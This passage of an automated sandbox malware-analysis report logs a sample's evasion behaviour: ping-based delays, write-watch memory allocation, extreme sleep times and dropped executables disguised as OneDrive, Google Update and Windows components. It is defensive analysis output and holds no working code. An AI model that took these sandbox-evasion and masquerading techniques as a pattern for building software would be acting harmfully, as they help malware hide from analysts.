Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: 1860000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: 1B460000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Memory allocated: B00000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Memory allocated: 1A6C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Memory allocated: 1900000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Memory allocated: 1B2F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: 840000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: 1A400000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: 16B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: 1B320000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Memory allocated: 17E0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Memory allocated: 1B2A0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Memory allocated: 1380000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Memory allocated: 1AE90000 memory reserve | memory write watch
Source: C:\Recovery\StartMenuExperienceHost.exe Memory allocated: 1440000 memory reserve | memory write watch
Source: C:\Recovery\StartMenuExperienceHost.exe Memory allocated: 1AFE0000 memory reserve | memory write watch
Source: C:\Recovery\StartMenuExperienceHost.exe Memory allocated: 1170000 memory reserve | memory write watch
Source: C:\Recovery\StartMenuExperienceHost.exe Memory allocated: 1AE10000 memory reserve | memory write watch
Source: C:\Recovery\StartMenuExperienceHost.exe Memory allocated: 1230000 memory reserve | memory write watch
Source: C:\Recovery\StartMenuExperienceHost.exe Memory allocated: 1AC70000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599873 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598999 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 3600000 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598014 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597796 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597686 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597468 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597358 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597140 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597031 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596921 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596812 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596586 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596484 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596374 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596256 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596012 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595905 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595684 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595468 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595140 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594921 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594583 Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Window / User API: threadDelayed 1994 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Window / User API: threadDelayed 7798 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Dropped PE file which has not been started: C:\Users\user\Desktop\KjTCumlu.log Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ALzNWdSZ.log Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe TID: 7580 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 7764 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -30437127721620741s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599873s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599546s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599218s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598999s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598890s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 4296 Thread sleep time: -3600000s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598671s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598343s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598234s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598125s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -598014s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597906s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597796s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597686s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597578s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597468s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597358s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597250s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597140s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -597031s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596921s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596812s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596586s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596484s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596374s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596256s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596125s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -596012s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595905s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595796s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595684s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595578s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595468s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595359s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595250s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595140s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -595031s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -594921s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -594812s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -594703s >= -30000s Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe TID: 5552 Thread sleep time: -594583s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe TID: 7964 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe TID: 5816 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe TID: 2736 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe TID: 2200 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe TID: 2688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\StartMenuExperienceHost.exe TID: 2800 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\StartMenuExperienceHost.exe TID: 2692 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\StartMenuExperienceHost.exe TID: 4020 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\StartMenuExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\StartMenuExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\StartMenuExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599873 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599328 Jump to behavior
